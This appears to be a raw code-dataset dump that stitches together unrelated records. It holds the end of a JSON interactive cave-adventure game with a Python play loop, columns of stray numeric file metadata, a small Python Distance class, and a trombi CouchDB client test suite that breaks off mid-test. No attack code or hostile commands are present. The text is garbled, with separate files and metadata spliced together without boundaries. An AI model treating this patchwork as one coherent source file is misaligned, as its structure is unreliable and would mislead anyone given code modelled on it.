"cleanText": "You take a deep breath and look at him and it finally clicks in your head.\nYou: Mark?\nThe demon king laughs.\nDemon King: Yes, but not your Mark. You see, the realm of monsters is not like that of humans. As part of the curse that locks all monster-kind here we are forever stuck in a loop. Our history is doomed to repeat forever. Though I have not been called that for ages, I am a version of Mark that has walked a tried and true path. The realm of monsters has judged you and seen your path. As such, you will be permitted to leave. I will give you the option to stay as the monsters have taken a liking to you.\nYou turn around and see Wilbur and his brother Orville and the goblin standing in the entrance. The demon king smiles. What will it be friend?"
},
{
"name": "GoodEndingStay",
"tags": "",
"id": "60",
"score": 20,
"text": "You: I want to stay. These monsters are my family they did everything they could to bring me here and sacrificed a lot. Since everything is doomed to repeat, there will be another version of me right? He can leave. Me? I want to stay.\nMark: A wise choice friend.\nMark smiles. Wilburs motions you forward and you all leave the throne room going back to the entrance. What started as a cave exploration was an exploration of what it means to be a true friend.\n\nGOOD ENDING: Type SECRET at an important choice for the true ending!",
"links": [],
"hooks": [],
"cleanText": "You: I want to stay. These monsters are my family they did everything they could to bring me here and sacrificed a lot. Since everything is doomed to repeat, there will be another version of me right? He can leave. Me? I want to stay.\nMark: A wise choice friend.\nMark smiles. Wilburs motions you forward and you all leave the throne room going back to the entrance. What started as a cave exploration was an exploration of what it means to be a true friend.\n\nGOOD ENDING: Type SECRET at an important choice for the true ending!"
},
{
"name": "GoodEndingLeave",
"tags": "",
"id": "61",
"score": 20,
"text": "You: I want to leave. Wilbur and everyone else will be invaluable friends but since everything is doomed to repeat, for the sake of my other copies, I should go home. Another version of me will stay. Me? I should go.\nMark: A wise choice friend.\nMark smiles and opens the door. The sun shines through. For the first time in awhile, you can smell the fresh air. It's time to go home.\nAll of your friends smile and wave as you walk away.\nWilbur: Do you think he'll ever come back?\nMark: He always does.\n\nGOOD ENDING: Type SECRET at an important choice for the true ending!",
"links": [],
"hooks": [],
"cleanText": "You: I want to leave. Wilbur and everyone else will be invaluable friends but since everything is doomed to repeat, for the sake of my other copies, I should go home. Another version of me will stay. Me? I should go.\nMark: A wise choice friend.\nMark smiles and opens the door. The sun shines through. For the first time in awhile, you can smell the fresh air. It's time to go home.\nAll of your friends smile and wave as you walk away.\nWilbur: Do you think he'll ever come back?\nMark: He always does.\n\nGOOD ENDING: Type SECRET at an important choice for the true ending!"
},
{
"name": "SecretEnding",
"tags": "",
"id": "62",
"score": 50,
"text": "You: Why can't you guys come too?\nMark looks surprised.\nWilbur: Monsters in the human world?\nMark is in deep thought.\nWilbur: This human was pretty cool. I trust him.\nMark: Maybe your coming was a sign that the curse is broken. Shall we test the morals of humans once again?\nMark walks forward and hand in hand, you all open and walk through the door to the outside.\n\nTRUE ENDING",
"links": [],
"hooks": [],
"cleanText": "You: Why can't you guys come too?\nMark looks surprised.\nWilbur: Monsters in the human world?\nMark is in deep thought.\nWilbur: This human was pretty cool. I trust him.\nMark: Maybe your coming was a sign that the curse is broken. Shall we test the morals of humans once again?\nMark walks forward and hand in hand, you all open and walk through the door to the outside.\n\nTRUE ENDING"
},
{
"name": "ThroneRoomEvil1",
"tags": "",
"id": "63",
"text": "You: What's gonna happen to me?\nMark: You will be punished. For killing innocent monsters you will be the front guard of the cave. All who the cave beckons, you must push so they may be judged. This is your duty. Even if it is yourself.\nYou: What if I don't.\nMark laughs.\nMark: You don't make the choice. The cave controls you now, you must simply observe as it uses you.\nYou start to feel dizzy and slowly black out.\nMark: Goodbye, old friend.\n\n[[NEXT->BadEnding]]",
"links": [
{
"linkText": "NEXT",
"passageName": "BadEnding",
"original": "[[NEXT->BadEnding]]"
}
],
"hooks": [],
"cleanText": "You: What's gonna happen to me?\nMark: You will be punished. For killing innocent monsters you will be the front guard of the cave. All who the cave beckons, you must push so they may be judged. This is your duty. Even if it is yourself.\nYou: What if I don't.\nMark laughs.\nMark: You don't make the choice. The cave controls you now, you must simply observe as it uses you.\nYou start to feel dizzy and slowly black out.\nMark: Goodbye, old friend."
},
{
"name": "BadEnding",
"tags": "",
"id": "64",
"score": -20,
"text": "You wake up in a cave and see 2 children over by the ledge. One of the children is gazing deep into the cave and distracted.\nChild 1: Did you see that??\nYou: Want a closer look?\nThe child screams on his way down the cave. The other child turns around and it's you. The cave is in control now.\nYou: H-hey! What are you doing here?\nIt's too late you push the other child down.\n\nBAD ENDING",
"links": [],
"hooks": [],
"cleanText": "You wake up in a cave and see 2 children over by the ledge. One of the children is gazing deep into the cave and distracted.\nChild 1: Did you see that??\nYou: Want a closer look?\nThe child screams on his way down the cave. The other child turns around and it's you. The cave is in control now.\nYou: H-hey! What are you doing here?\nIt's too late you push the other child down.\n\nBAD ENDING"
},
{
"name": "ThroneRoomOrville1",
"tags": "",
"id": "65",
"text": "You: What's gonna happen to me?\nMark: You will be punished. For killing Orville you must atone by living out Wilbur's life and forever will you watch you brother be killed, other times you won't but everytime you die you will play the cruel game of lottery again. Such is fate. But your promise is to always bring the human to me no matter what.\nYou start to feel dizzy and slowly black out.\nMark: Goodbye, old friend.\n\n[[NEXT->BadEnding2]]",
"links": [
{
"linkText": "NEXT",
"passageName": "BadEnding2",
"original": "[[NEXT->BadEnding2]]"
}
],
"hooks": [],
"cleanText": "You: What's gonna happen to me?\nMark: You will be punished. For killing Orville you must atone by living out Wilbur's life and forever will you watch you brother be killed, other times you won't but everytime you die you will play the cruel game of lottery again. Such is fate. But your promise is to always bring the human to me no matter what.\nYou start to feel dizzy and slowly black out.\nMark: Goodbye, old friend."
},
{
"name": "BadEnding2",
"tags": "",
"id": "66",
"score": -20,
"text": "You're on an evening stroll and suddenly a child falls in front of you.\\\nYou: Hey bud are you ok?\n\nBAD ENDING",
"links": [],
"hooks": [],
"cleanText": "You're on an evening stroll and suddenly a child falls in front of you.\\\nYou: Hey bud are you ok?\n\nBAD ENDING"
}
]
}
# ----------------------------------------------------------------
def find_current_location(location_label):
if "passages" in world:
for passage in world["passages"]:
if location_label == passage["name"]:
return passage
return {}
# ----------------------------------------------------------------
def render(current_location, score, moves):
if "name" in current_location and "cleanText" in current_location:
#print("Moves: " + str(moves) + ", Score: " + str(score))
print("Moves: {}, Score: {}".format(moves, score))
print(current_location["cleanText"] + "\n")
for link in current_location["links"]:
if link["linkText"] != "SECRET":
print(link["linkText"])
def get_input():
response = input("What do you want to do? ")
response = response.upper().strip()
return response
def update(current_location, location_label, response):
if response == "":
return location_label
if "links" in current_location:
for link in current_location["links"]:
if link["linkText"] == response:
return link["passageName"]
print("I don't understand what you are trying to do. Try again.")
return location_label
# ----------------------------------------------------------------
location_label = "Bedroom"
current_location = {}
response = ""
score = 0
moves = 0
while True:
if response == "QUIT":
break
moves += 1
location_label = update(current_location, location_label, response)
current_location = find_current_location(location_label)
if "score" in current_location:
score += current_location["score"]
render(current_location, score, moves)
response = get_input()
print("Thanks for playing!")
| 69.153279
| 1,324
| 0.651333
| 12,786
| 84,367
| 4.295401
| 0.100501
| 0.00721
| 0.014858
| 0.013255
| 0.859981
| 0.855939
| 0.850731
| 0.846507
| 0.846507
| 0.844941
| 0
| 0.00525
| 0.239181
| 84,367
| 1,220
| 1,325
| 69.153279
| 0.850377
| 0.003224
| 0
| 0.3597
| 0
| 0.105745
| 0.808446
| 0.049137
| 0
| 0
| 0
| 0
| 0.000833
| 1
| 0.003331
| false
| 0.085762
| 0.004163
| 0
| 0.01249
| 0.007494
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
2a8725cd14056eca9aaf82f98e1d0bececf67330
| 267
|
py
|
Python
|
backend/venue_service/api/venue/models/distance.py
|
ktodorov/aed-2018
|
337a8df6d2239d35432663e1b340977b3bfba4ae
|
[
"MIT"
] | null | null | null |
backend/venue_service/api/venue/models/distance.py
|
ktodorov/aed-2018
|
337a8df6d2239d35432663e1b340977b3bfba4ae
|
[
"MIT"
] | null | null | null |
backend/venue_service/api/venue/models/distance.py
|
ktodorov/aed-2018
|
337a8df6d2239d35432663e1b340977b3bfba4ae
|
[
"MIT"
] | null | null | null |
class Distance:
kilometers = 0.0
minutes = 0.0
def __init__(self, kilometers, minutes):
self.kilometers = kilometers
self.minutes = minutes
def toJson(self):
return { "kilometers" : self.kilometers, "minutes" : self.minutes }
| 26.7
| 75
| 0.632959
| 29
| 267
| 5.689655
| 0.344828
| 0.254545
| 0.254545
| 0.30303
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.020305
| 0.262172
| 267
| 10
| 75
| 26.7
| 0.817259
| 0
| 0
| 0
| 0
| 0
| 0.063433
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0
| 0.125
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
aa51036c2107182924e8e93507c42ad5602d53ad
| 43,627
|
py
|
Python
|
test/test_client.py
|
nailor/trombi
|
a0a761b45abc6b22b45253cba1962f09173ffd37
|
[
"MIT"
] | 1
|
2020-12-29T06:05:46.000Z
|
2020-12-29T06:05:46.000Z
|
test/test_client.py
|
nailor/trombi
|
a0a761b45abc6b22b45253cba1962f09173ffd37
|
[
"MIT"
] | null | null | null |
test/test_client.py
|
nailor/trombi
|
a0a761b45abc6b22b45253cba1962f09173ffd37
|
[
"MIT"
] | null | null | null |
# Copuright (c) 2011 Jyrki Pulliainen <jyrki@dywypi.org>
# Copyright (c) 2010 Inoi Oy
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use, copy,
# modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import with_statement
from datetime import datetime
from nose.tools import eq_ as eq
from couch_util import setup, teardown, with_couchdb
from util import with_ioloop, DatetimeEncoder
try:
import json
except ImportError:
import simplejson as json
import urllib
import trombi
import trombi.errors
def test_from_uri():
db = trombi.from_uri('http://1.2.3.4/foobar')
assert isinstance(db.server, trombi.Server)
eq(db.baseurl, 'http://1.2.3.4/foobar')
eq(db.name, 'foobar')
db = trombi.from_uri('http://1.2.3.4:1122/foobar/')
assert isinstance(db.server, trombi.Server)
eq(db.baseurl, 'http://1.2.3.4:1122/foobar')
eq(db.name, 'foobar')
@with_ioloop
def test_cannot_connect(ioloop):
def create_callback(db):
eq(db.error, True)
eq(db.errno, 599)
eq(db.msg, 'Unable to connect to CouchDB')
ioloop.stop()
s = trombi.Server('http://localhost:39998', io_loop=ioloop)
s.create('couchdb-database', callback=create_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_create_db(baseurl, ioloop):
def create_callback(db):
eq(db.error, False)
assert isinstance(db, trombi.Database)
f = urllib.urlopen('%s_all_dbs' % baseurl)
assert 'couchdb-database' in json.load(f)
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('couchdb-database', callback=create_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_db_exists(baseurl, ioloop):
s = trombi.Server(baseurl, io_loop=ioloop)
def first_callback(db):
s.create(
'couchdb-database',
callback=callback,
)
def callback(result):
eq(result.error, True)
eq(result.errno, trombi.errors.PRECONDITION_FAILED)
eq(result.msg, "Database already exists: 'couchdb-database'")
f = urllib.urlopen('%s_all_dbs' % baseurl)
assert 'couchdb-database' in json.load(f)
ioloop.stop()
s.create('couchdb-database', callback=first_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_invalid_db_name(baseurl, ioloop):
def callback(result):
eq(result.error, True)
eq(result.errno, trombi.errors.INVALID_DATABASE_NAME)
eq(result.msg, "Invalid database name: 'this name is invalid'")
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('this name is invalid', callback=callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_get_create_doesnt_yet_exist(baseurl, ioloop):
def callback(db):
eq(db.error, False)
eq(db.name, 'nonexistent')
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.get('nonexistent', create=True, callback=callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_get_create_already_exists(baseurl, ioloop):
def create_callback(db):
eq(db.name, 'new')
s.get('new', create=True, callback=get_callback)
def get_callback(db):
eq(db.error, False)
eq(db.name, 'new')
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('new', callback=create_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_delete_db(baseurl, ioloop):
s = trombi.Server(baseurl, io_loop=ioloop)
def create_callback(db):
s.delete('testdatabase', callback=delete_callback)
def delete_callback(result):
eq(result.error, False)
f = urllib.urlopen('%s_all_dbs' % baseurl)
eq([x for x in json.load(f) if not x.startswith('_')], [])
ioloop.stop()
s.create('testdatabase', callback=create_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_delete_db_not_exists(baseurl, ioloop):
def callback(result):
eq(result.error, True)
eq(result.errno, trombi.errors.NOT_FOUND)
eq(result.msg, "Database does not exist: 'testdatabase'")
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.delete('testdatabase', callback=callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_list_databases(baseurl, ioloop):
def create_first(db):
s.create('testdb2', callback=create_second)
def create_second(db):
s.list(callback=list_callback)
def list_callback(databases):
databases = list(databases)
assert all(isinstance(x, trombi.Database) for x in databases)
eq(
set(['testdb2', 'testdb1']),
set([x.name for x in databases if not x.name.startswith('_')]),
)
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb1', callback=create_first)
ioloop.start()
@with_ioloop
@with_couchdb
def test_open_database(baseurl, ioloop):
s = trombi.Server(baseurl, io_loop=ioloop)
def create_callback(db):
s.get('testdb1', callback=get_callback)
def get_callback(db):
eq(db.error, False)
eq(db.name, 'testdb1')
eq(db.server, s)
ioloop.stop()
s.create('testdb1', callback=create_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_open_nonexisting_database(baseurl, ioloop):
s = trombi.Server(baseurl, io_loop=ioloop)
def callback(result):
eq(result.error, True)
eq(result.errno, trombi.errors.NOT_FOUND)
eq(result.msg, "Database not found: testdb1")
ioloop.stop()
s.get('testdb1', callback=callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_open_database_bad_name(baseurl, ioloop):
s = trombi.Server(baseurl, io_loop=ioloop)
def callback(result):
eq(result.error, True)
eq(result.errno, trombi.errors.INVALID_DATABASE_NAME)
eq(result.msg, "Invalid database name: 'not a valid name'")
ioloop.stop()
s.get('not a valid name', callback=callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_create_document(baseurl, ioloop):
def create_db_callback(db):
db.set(
{'testvalue': 'something'},
create_doc_callback,
)
def create_doc_callback(doc):
eq(doc.error, False)
assert isinstance(doc, trombi.Document)
assert doc.id
assert doc.rev
eq(doc['testvalue'], 'something')
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=create_db_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_create_document_with_slash(baseurl, ioloop):
def create_db_callback(db):
db.set(
'something/with/slash',
{'testvalue': 'something'},
create_doc_callback,
)
def create_doc_callback(doc):
eq(doc.error, False)
assert isinstance(doc, trombi.Document)
assert doc.id
assert doc.rev
eq(doc.id, 'something/with/slash')
eq(doc['testvalue'], 'something')
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=create_db_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_get_document(baseurl, ioloop):
def do_test(db):
def create_doc_callback(doc):
db.get(doc.id, callback=get_doc_callback)
def get_doc_callback(doc):
eq(doc.error, False)
assert isinstance(doc, trombi.Document)
assert doc.id
assert doc.rev
eq(doc['testvalue'], 'something')
ioloop.stop()
db.set(
{'testvalue': 'something'},
create_doc_callback,
)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_get_document_with_attachments(baseurl, ioloop):
def do_test(db):
def create_doc_callback(doc):
db.get(doc.id, callback=get_doc_callback, attachments=True)
def get_doc_callback(doc):
assert isinstance(doc, trombi.Document)
assert doc.id
assert doc.rev
eq(doc['testvalue'], 'something')
def _assert_on_fetch(*a, **kw):
assert False, 'Fetch detected, failing test!'
doc.db._fetch = _assert_on_fetch
doc.load_attachment('foo', got_attachment)
def got_attachment(data):
eq(data, 'bar')
ioloop.stop()
db.set(
{'testvalue': 'something'},
create_doc_callback,
attachments={'foo': (None, 'bar')}
)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_create_document_custom_id(baseurl, ioloop):
def do_test(db):
def create_doc_callback(doc):
eq(doc.error, False)
assert isinstance(doc, trombi.Document)
eq(doc.id, 'testid')
assert '_id' not in doc
assert '_rev' not in doc
assert doc.rev
eq(doc['testvalue'], 'something')
f = urllib.urlopen('%stestdb/testid' % baseurl)
eq(json.load(f),
{'_id': 'testid',
'_rev': doc.rev,
'testvalue': 'something',
})
ioloop.stop()
db.set(
'testid',
{'testvalue': 'something'},
create_doc_callback,
)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_delete_document(baseurl, ioloop):
def do_test(db):
def create_doc_callback(doc):
eq(db.error, False)
db.delete(doc, callback=delete_doc_callback)
def delete_doc_callback(db):
eq(db.error, False)
assert isinstance(db, trombi.Database)
ioloop.stop()
f = urllib.urlopen('%stestdb/testid' % baseurl)
eq(f.getcode(), 404)
db.set(
'testid',
{'testvalue': 'something'},
create_doc_callback,
)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_delete_document_not_existing(baseurl, ioloop):
def do_test(db):
def create_doc_callback(doc):
doc.id = 'wrongid'
db.delete(doc, callback=delete_doc_errback)
def delete_doc_errback(response):
eq(response.error, True)
eq(response.errno, trombi.errors.NOT_FOUND)
eq(response.msg, 'missing')
ioloop.stop()
db.set(
'testid',
{'testvalue': 'something'},
create_doc_callback,
)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_delete_document_wrong_rev(baseurl, ioloop):
def do_test(db):
def create_doc_callback(doc):
doc.rev = '1-eabf'
db.delete(doc, callback=delete_doc_callback)
def delete_doc_callback(result):
eq(result.error, True)
eq(result.errno, trombi.errors.CONFLICT)
eq(result.msg, 'Document update conflict.')
ioloop.stop()
db.set(
'testid',
{'testvalue': 'something'},
create_doc_callback,
)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_delete_document_invalid_rev(baseurl, ioloop):
def do_test(db):
def create_doc_callback(doc):
doc.rev = 'invalid'
db.delete(doc, callback=delete_doc_callback)
def delete_doc_callback(result):
eq(result.error, True)
eq(result.errno, trombi.errors.BAD_REQUEST)
eq(result.msg, 'Invalid rev format')
ioloop.stop()
db.set(
'testid',
{'testvalue': 'something'},
create_doc_callback,
)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_create_document_custom_id_exists(baseurl, ioloop):
def do_test(db):
def create_doc_callback(doc):
db.set(
'testid',
{'testvalue': 'something'},
update_doc_error,
)
def update_doc_error(result):
eq(result.error, True)
eq(result.errno, trombi.errors.CONFLICT)
eq(result.msg, 'Document update conflict.')
ioloop.stop()
db.set(
'testid',
{'testvalue': 'something'},
create_doc_callback,
)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_update_document(baseurl, ioloop):
def do_test(db):
def update_doc(doc):
doc['newvalue'] = 'somethingelse'
db.set(doc, doc_updated)
def doc_updated(doc):
eq(doc, {
'testvalue': 'something',
'newvalue': 'somethingelse',
})
ioloop.stop()
db.set(
'testid',
{'testvalue': 'something'},
update_doc,
)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_set_document_change_id(baseurl, ioloop):
def do_test(db):
def update_doc(doc):
doc['newvalue'] = 'somethingelse'
db.set('otherid', doc, doc_updated)
def doc_updated(doc):
eq(doc, {
'testvalue': 'something',
'newvalue': 'somethingelse',
})
eq(doc.id, 'otherid')
# Check that the original didn't change
db.get('testid', check_original)
def check_original(doc):
eq(doc, {'testvalue': 'something'})
eq(doc.id, 'testid')
ioloop.stop()
db.set('testid', {'testvalue': 'something'}, update_doc)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_get_document_does_not_exist(baseurl, ioloop):
def create_db_callback(db):
db.get('foo', callback=get_callback)
def get_callback(doc):
eq(doc, None)
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=create_db_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_save_attachment_inline(baseurl, ioloop):
def create_db_callback(db):
db.set(
'testid',
{'testvalue': 'something'},
data_callback,
attachments={'foobar': (None, 'some textual data')},
)
def data_callback(doc):
f = urllib.urlopen('%stestdb/testid/foobar' % baseurl)
eq(f.read(), 'some textual data')
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=create_db_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_save_attachment_inline_custom_content_type(baseurl, ioloop):
def create_db_callback(db):
db.set(
'testid',
{'testvalue': 'something'},
data_callback,
attachments={'foobar':
('application/x-custom', 'some textual data')
},
)
def data_callback(doc):
f = urllib.urlopen('%stestdb/testid/foobar' % baseurl)
eq(f.info()['Content-Type'], 'application/x-custom')
eq(f.read(), 'some textual data')
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=create_db_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_save_attachment(baseurl, ioloop):
def create_db_callback(db):
db.set(
'testid',
{'testvalue': 'something'},
create_doc_callback,
)
def create_doc_callback(doc):
data = 'some textual data'
doc.attach('foobar', data, callback=data_callback)
def data_callback(doc):
f = urllib.urlopen('%stestdb/testid/foobar' % baseurl)
eq(f.read(), 'some textual data')
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=create_db_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_save_attachment_wrong_rev(baseurl, ioloop):
def do_test(db):
def create_doc_callback(doc):
doc.rev = '1-deadbeef'
data = 'some textual data'
doc.attach('foobar', data, callback=data_callback)
def data_callback(doc):
eq(doc.error, True)
ioloop.stop()
db.set(
'testid',
{'testvalue': 'something'},
create_doc_callback,
)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_load_attachment(baseurl, ioloop):
def create_db_callback(db):
db.set(
'testid',
{'testvalue': 'something'},
create_doc_callback,
)
def create_doc_callback(doc):
data = 'some textual data'
doc.attach('foobar', data, callback=attach_callback)
def attach_callback(doc):
doc.load_attachment('foobar', callback=data_callback)
def data_callback(data):
eq(data, 'some textual data')
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=create_db_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_load_unkonwn_attachment(baseurl, ioloop):
def create_db_callback(db):
db.set(
'testid',
{'testvalue': 'something'},
create_doc_callback,
)
def create_doc_callback(doc):
doc.load_attachment('foobar', callback=data_callback)
def data_callback(result):
eq(result.error, True)
eq(result.errno, trombi.errors.NOT_FOUND)
eq(result.msg, 'Document is missing attachment')
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=create_db_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_load_inline_attachment(baseurl, ioloop):
def create_db_callback(db):
db.set(
'testid',
{'testvalue': 'something'},
attach_callback,
attachments={'foobar': (None, 'some textual data')},
)
def attach_callback(doc):
doc.load_attachment('foobar', callback=data_callback)
def data_callback(data):
eq(data, 'some textual data')
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=create_db_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_load_inline_attachment_no_fetch(baseurl, ioloop):
def create_db_callback(db):
db.set(
'testid',
{'testvalue': 'something'},
attach_callback,
attachments={'foobar': (None, 'some textual data')},
)
def attach_callback(doc):
def _broken_fetch(*a, **kw):
assert False, 'Fetch called when not needed!'
doc.db._fetch = _broken_fetch
doc.load_attachment('foobar', callback=data_callback)
def data_callback(data):
eq(data, 'some textual data')
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=create_db_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_delete_attachment(baseurl, ioloop):
def create_db_callback(db):
db.set(
'testid',
{'testvalue': 'something'},
create_doc_callback,
)
def create_doc_callback(doc):
data = 'some textual data'
doc.attach('foobar', data, callback=attach_callback)
def attach_callback(doc):
doc.delete_attachment('foobar', callback=delete_callback)
def delete_callback(doc):
f = urllib.urlopen('%stestdb/testid/foobar' % baseurl)
eq(f.getcode(), 404)
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=create_db_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_delete_attachment_wrong_rev(baseurl, ioloop):
def create_db_callback(db):
db.set(
'testid',
{'testvalue': 'something'},
create_doc_callback,
)
def create_doc_callback(doc):
doc.rev = '1-deadwrong'
data = 'some textual data'
doc.attach('foobar', data, callback=attach_callback)
def attach_callback(doc):
eq(doc.error, True)
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=create_db_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_load_view_empty_results(baseurl, ioloop):
def do_test(db):
def create_view_callback(response):
eq(response.code, 201)
db.view('testview', 'all', load_view_cb)
def load_view_cb(result):
assert isinstance(result, trombi.ViewResult)
eq(result.error, False)
eq(len(result), 0)
ioloop.stop()
db.server._fetch(
'%stestdb/_design/testview' % baseurl,
create_view_callback,
method='PUT',
body=json.dumps(
{
'language': 'javascript',
'views': {
'all': {
'map': 'function (doc) { emit(null, doc) }',
}
}
}
)
)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_load_view_with_results(baseurl, ioloop):
def do_test(db):
def create_view_callback(response):
eq(response.code, 201)
db.set({'data': 'data'}, create_doc_cb)
def create_doc_cb(doc):
db.view('testview', 'all', load_view_cb)
def load_view_cb(result):
eq(result.error, False)
eq(len(result), 1)
del result[0]['value']['_rev']
del result[0]['value']['_id']
del result[0]['id']
eq(list(result), [{'value': {'data': 'data'}, 'key': None}])
ioloop.stop()
db.server._fetch(
'%stestdb/_design/testview' % baseurl,
create_view_callback,
method='PUT',
body=json.dumps(
{
'language': 'javascript',
'views': {
'all': {
'map': 'function (doc) { emit(null, doc) }',
}
}
}
)
)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_load_view_with_grouping_reduce(baseurl, ioloop):
def do_test(db):
def create_view_callback(response):
eq(response.code, 201)
db.set({'data': 'data'}, create_1st_doc_cb)
def create_1st_doc_cb(doc):
db.set({'data': 'other'}, create_2nd_doc_cb)
def create_2nd_doc_cb(doc):
db.view('testview', 'all', load_view_cb, group=True)
def load_view_cb(result):
eq(result.error, False)
eq(list(result), [{'value': 1, 'key': 'data'},
{'value': 1, 'key': 'other'}])
ioloop.stop()
db.server._fetch(
'%stestdb/_design/testview' % baseurl,
create_view_callback,
method='PUT',
body=json.dumps(
{
'language': 'javascript',
'views': {
'all': {
'map': 'function (doc) { emit(doc.data, doc) }',
'reduce': 'function (key, value) { return \
value.length }',
}
}
}
)
)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_load_view_with_keys(baseurl, ioloop):
def do_test(db):
def create_view_callback(response):
eq(response.code, 201)
db.set({'data': 'data'}, create_1st_doc_cb)
def create_1st_doc_cb(doc):
db.set({'data': 'other'}, create_2nd_doc_cb)
def create_2nd_doc_cb(doc):
db.view('testview', 'all', load_view_cb, keys=['data'])
def load_view_cb(result):
eq(result.error, False)
eq(len(result), 1)
